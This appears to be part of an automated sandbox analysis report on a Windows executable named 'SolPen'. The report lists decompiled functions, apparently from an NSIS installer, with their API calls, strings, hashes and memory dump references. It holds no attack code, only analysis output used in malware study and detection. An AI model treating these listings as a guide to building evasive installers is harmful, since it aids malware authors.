SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CCD
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D28
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D3D
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D61
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404D87
ImageList_Destroy.COMCTL32(?), ref: 00404D9C
GlobalFree.KERNEL32(?), ref: 00404DAC
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E1C
SendMessageW.USER32(?,00001102,?,?), ref: 00404ECA
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404ED9
InvalidateRect.USER32(?,00000000,00000001), ref: 00404EF9
ShowWindow.USER32(?,00000000), ref: 00404F49
GetDlgItem.USER32(?,000003FE), ref: 00404F54
ShowWindow.USER32(00000000), ref: 00404F5B

Strings

N, xrefs: 00404C06
, xrefs: 00404F39
M, xrefs: 00404B43
@, xrefs: 00404B90

Memory Dump Source

Source File: 00000003.00000002.1417793706.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1417734177.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417818383.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.00000000004BB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417986743.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SolPen.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $ @$M$N
API String ID: 1638840714-3479655940
Opcode ID: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
Instruction ID: e2b6c32447eba08f07ab18e4c0942225b167af9b9c7e550a0b0592367213937f
Opcode Fuzzy Hash: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
Instruction Fuzzy Hash: 09026CB0900209AFEF209FA4CD45AAE7BB5FB84314F10413AF615B62E1D7B89D91DF58

Function 004044A5 Relevance: 33.6, APIs: 15, Strings: 4, Instructions: 300stringkeyboardCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F0), ref: 004044F9
IsDlgButtonChecked.USER32(?,000003F0), ref: 00404507
GetDlgItem.USER32(?,000003FB), ref: 00404527
GetAsyncKeyState.USER32(00000010), ref: 0040452E
GetDlgItem.USER32(?,000003F0), ref: 00404543
ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404554
SetWindowTextW.USER32(?,?), ref: 00404583
SHBrowseForFolderW.SHELL32(?), ref: 0040463D
lstrcmpiW.KERNEL32(00462540,00447240,00000000,?,?), ref: 0040467A
lstrcatW.KERNEL32(?,00462540), ref: 00404686
SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404696
CoTaskMemFree.OLE32(00000000), ref: 00404648

Part of subcall function 00405C84: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403F81), ref: 00405C97

Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3

Part of subcall function 00403E74: lstrcatW.KERNEL32(00000000,00000000,0046A560,004C70A8,install.log,00405A9C,004C70A8,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006), ref: 00403E8F

GetDiskFreeSpaceW.KERNEL32(00443238,?,?,0000040F,?,00443238,00443238,?,00000000,00443238,?,?,000003FB,?), ref: 00404759
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404774

Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6

SetDlgItemTextW.USER32(00000000,00000400,00409264), ref: 004047ED

Strings

82D, xrefs: 004046DB
@rD, xrefs: 00404610
A, xrefs: 00404636
@%F, xrefs: 00404674

Memory Dump Source

Source File: 00000003.00000002.1417793706.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1417734177.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417818383.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.00000000004BB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417986743.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SolPen.jbxd

Similarity

API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
String ID: 82D$@%F$@rD$A
API String ID: 3347642858-1086125096
Opcode ID: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
Instruction ID: 5c5d6a603380bcdbc7d7d35b60f5621b43697e5e98684918e033f9398a36e476
Opcode Fuzzy Hash: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
Instruction Fuzzy Hash: D1B1A4B1900209BBDB11AFA1CD85AAF7AB8EF45314F10847BF605B72D1D77C8A41CB59

Function 00406ED2 Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270filestringCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F30
ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FA9
lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FB5
lstrcmpA.KERNEL32(name,?), ref: 00406FC7
CloseHandle.KERNEL32(?), ref: 004071E6

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

GetTTFNameString, xrefs: 00406F07
name, xrefs: 00406FBF
%s: failed opening file "%s", xrefs: 00406F0C

Memory Dump Source

Source File: 00000003.00000002.1417793706.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1417734177.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417818383.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.00000000004BB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417986743.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SolPen.jbxd

Similarity

API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
String ID: %s: failed opening file "%s"$GetTTFNameString$name
API String ID: 1916479912-1189179171
Opcode ID: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
Instruction ID: 34713ba181b26839f7619e948cf229fd8716e5ee99c03f3e8673f79b0d3e70cf
Opcode Fuzzy Hash: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
Instruction Fuzzy Hash: 9091BF70D1412DAACF04EBA5DD909FEBBBAEF48301F00416AF592F72D0E6785A05DB64

Function 00406C9B Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 190filestringCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,004C30A0), ref: 00406CB8
lstrcatW.KERNEL32(0045C918,\*.*,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D09
lstrcatW.KERNEL32(?,00408838,?,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D29
lstrlenW.KERNEL32(?), ref: 00406D2C
FindFirstFileW.KERNEL32(0045C918,?), ref: 00406D40
FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E22
FindClose.KERNEL32(?), ref: 00406E33

Strings

RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E58
RMDir: RemoveDirectory("%s"), xrefs: 00406E6F
Delete: DeleteFile("%s"), xrefs: 00406DBC
RMDir: RemoveDirectory failed("%s"), xrefs: 00406EB0
RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406E93
Delete: DeleteFile on Reboot("%s"), xrefs: 00406DE0
\*.*, xrefs: 00406D03
Delete: DeleteFile failed("%s"), xrefs: 00406DFD

Memory Dump Source

Source File: 00000003.00000002.1417793706.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1417734177.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417818383.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.00000000004BB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417986743.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SolPen.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*
API String ID: 2035342205-3294556389
Opcode ID: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
Instruction ID: 0ca3ec5a28b3c1cae8259a28e21d86b18febecd5c0179aed135e39ed79665852
Opcode Fuzzy Hash: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
Instruction Fuzzy Hash: 2D51E3315043056ADB20AB61CD46EAF37B89F81725F22803FF943751D2DB7C49A2DAAD

Function 00406805 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 212stringCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
GetSystemDirectoryW.KERNEL32(00462540,00002004), ref: 00406958

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

GetWindowsDirectoryW.KERNEL32(00462540,00002004), ref: 0040696B
lstrcatW.KERNEL32(00462540,\Microsoft\Internet Explorer\Quick Launch), ref: 004069E5
lstrlenW.KERNEL32(00462540,0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 00406A47

Strings

\Microsoft\Internet Explorer\Quick Launch, xrefs: 004069DF
@%F, xrefs: 0040682C
@%F, xrefs: 00406A53
Software\Microsoft\Windows\CurrentVersion, xrefs: 00406926

Memory Dump Source

Source File: 00000003.00000002.1417793706.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1417734177.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417818383.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.00000000004BB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417986743.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SolPen.jbxd

Similarity

API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
String ID: @%F$@%F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 3581403547-784952888
Opcode ID: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
Instruction ID: 7881bd453c5698e0e02013fa1c3524f2cf467b60749c67c5a59258f73e57ab2a
Opcode Fuzzy Hash: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
Instruction Fuzzy Hash: F171F4B1A00215ABDB20AF28CD44A7E3771EF55314F12C03FE906B62E0E77C89A19B5D

Function 004024FB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00409B24,?,00000001,00409B04,?), ref: 0040257E

Strings

CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560

Memory Dump Source

Source File: 00000003.00000002.1417793706.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1417734177.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417818383.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.00000000004BB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417986743.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SolPen.jbxd

Similarity

API ID: CreateInstance
String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
API String ID: 542301482-1377821865
Opcode ID: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
Instruction ID: c24c797a6f187c751e7d972b1a807078ee58ffeb38f484aa28d094541f0f6205
Opcode Fuzzy Hash: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
Instruction Fuzzy Hash: 02415E74A00205BFCF04EFA0CC99EAE7B79FF48314B20456AF915EB2E1C679A941CB54

Function 00402E18 Relevance: 1.5, APIs: 1, Instructions: 27fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402E27

Memory Dump Source

Source File: 00000003.00000002.1417793706.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1417734177.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417818383.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.00000000004BB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417986743.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SolPen.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
Instruction ID: b91193b5dd17d351e639dca097a4c2443a83fae7855d8014906372cda19badf2
Opcode Fuzzy Hash: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
Instruction Fuzzy Hash: 4EE06D32600204AFD700EB749D45ABE736CDF01329F20457BF146F20D1E6B89A41976A

Function 004063AC Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063BF
lstrlenW.KERNEL32(?), ref: 004063CC
GetVersionExW.KERNEL32(?), ref: 0040642A

Part of subcall function 0040602B: CharUpperW.USER32(?,00406401,?), ref: 00406031

LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406469
GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00406488
GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00406492
GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040649D
FreeLibrary.KERNEL32(00000000), ref: 004064D4
GlobalFree.KERNEL32(?), ref: 004064DD

Strings

Process32NextW, xrefs: 004065C8
Unknown, xrefs: 004064FC
Module32FirstW, xrefs: 004065D3
Process32FirstW, xrefs: 004065BD
PSAPI.DLL, xrefs: 00406464
Kernel32.DLL, xrefs: 0040659B
EnumProcessModules, xrefs: 0040648A
EnumProcesses, xrefs: 00406482
Module32NextW, xrefs: 004065DE
GetModuleBaseNameW, xrefs: 00406494
CreateToolhelp32Snapshot, xrefs: 004065B5

Memory Dump Source

Source File: 00000003.00000002.1417793706.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1417734177.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417818383.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.00000000004BB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417986743.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SolPen.jbxd

Similarity

API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
API String ID: 20674999-2124804629
Opcode ID: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
Instruction ID: f5db07f83b48746be4b9c4f5c588c21b75103c60b5638216cabcef37c42edb4d
Opcode Fuzzy Hash: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
Instruction Fuzzy Hash: 38919331900219EBDF109FA4CD88AAFBBB8EF44741F11447BE546F6281DB388A51CF68

Function 004040B8 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040416D
GetDlgItem.USER32(?,000003E8), ref: 00404181
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040419E
GetSysColor.USER32(?), ref: 004041AF
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041BD
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041CB
lstrlenW.KERNEL32(?), ref: 004041D6
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004041E3
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004041F2

Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404124,?), ref: 00403FE1
Part of subcall function 00403FCA: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404124,?), ref: 00403FF0
Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404124,?), ref: 00404004

GetDlgItem.USER32(?,0000040A), ref: 0040424A
SendMessageW.USER32(00000000), ref: 00404251
GetDlgItem.USER32(?,000003E8), ref: 0040427E
SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042C1
LoadCursorW.USER32(00000000,00007F02), ref: 004042CF
SetCursor.USER32(00000000), ref: 004042D2
ShellExecuteW.SHELL32(0000070B,open,00462540,00000000,00000000,00000001), ref: 004042E7
LoadCursorW.USER32(00000000,00007F00), ref: 004042F3
SetCursor.USER32(00000000), ref: 004042F6
SendMessageW.USER32(00000111,00000001,00000000), ref: 00404325
SendMessageW.USER32(00000010,00000000,00000000), ref: 00404337

Strings

N, xrefs: 0040426C
open, xrefs: 004042DF
@%F, xrefs: 004042A7

Memory Dump Source

Source File: 00000003.00000002.1417793706.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1417734177.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417818383.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.00000000004BB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417986743.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SolPen.jbxd

Similarity

API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
String ID: @%F$N$open
API String ID: 3928313111-3849437375
Opcode ID: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
Instruction ID: 2c1438ad93098d7b112eeb2502b55652a68651cb38e922ac8f4fb42b83a973d4
Opcode Fuzzy Hash: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
Instruction Fuzzy Hash: 0F71A4B1900609FFDB109F60DD45EAA7B79FB44305F00843AFA05B62D1C778A991CF99

Function 00406A99 Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 163filestringmemoryCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(0045B2C8,NUL,?,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AA9
CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AC8
GetShortPathNameW.KERNEL32(000000F1,0045B2C8,00000400), ref: 00406AD1

Part of subcall function 00405DB6: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
Part of subcall function 00405DB6: lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8

GetShortPathNameW.KERNEL32(000000F1,00460920,00000400), ref: 00406AF2
WideCharToMultiByte.KERNEL32(00000000,00000000,0045B2C8,000000FF,0045BAC8,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B1B
WideCharToMultiByte.KERNEL32(00000000,00000000,00460920,000000FF,0045C118,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B33
wsprintfA.USER32 ref: 00406B4D
GetFileSize.KERNEL32(00000000,00000000,00460920,C0000000,00000004,00460920,?,?,00000000,000000F1,?), ref: 00406B85
GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406B94
ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BB0
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406BE0
SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0045C518,00000000,-0000000A,0040987C,00000000,[Rename]), ref: 00406C37

Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76

WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C4B
GlobalFree.KERNEL32(00000000), ref: 00406C52
CloseHandle.KERNEL32(?), ref: 00406C5C

Strings

[Rename], xrefs: 00406BC8, 00406BD7
NUL, xrefs: 00406A9E
%s=%s, xrefs: 00406B43
F, xrefs: 00406AE8

Memory Dump Source

Source File: 00000003.00000002.1417793706.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1417734177.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417818383.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.00000000004BB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417986743.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SolPen.jbxd

Similarity

API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
String ID: F$%s=%s$NUL$[Rename]
API String ID: 565278875-1653569448
Opcode ID: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
Instruction ID: f97e154d5ee7f709bd30e138c0dd6e282719408add8f0d739c14b832633f1bd9
Opcode Fuzzy Hash: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
Instruction Fuzzy Hash: AE412632104208BFE6206B619E8CD6B3B6CDF86754B16043EF586F22D1DA3CDC158ABC

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010D8
FillRect.USER32(00000000,?,00000000), ref: 004010ED
DeleteObject.GDI32(?), ref: 004010F6
CreateFontIndirectW.GDI32(?), ref: 0040110E
SetBkMode.GDI32(00000000,00000001), ref: 0040112F
SetTextColor.GDI32(00000000,000000FF), ref: 00401139
SelectObject.GDI32(00000000,?), ref: 00401149
DrawTextW.USER32(00000000,0046ADC0,000000FF,00000010,00000820), ref: 0040115F
SelectObject.GDI32(00000000,00000000), ref: 00401169
DeleteObject.GDI32(?), ref: 0040116E
EndPaint.USER32(?,?), ref: 00401177

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000003.00000002.1417793706.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1417734177.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417818383.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
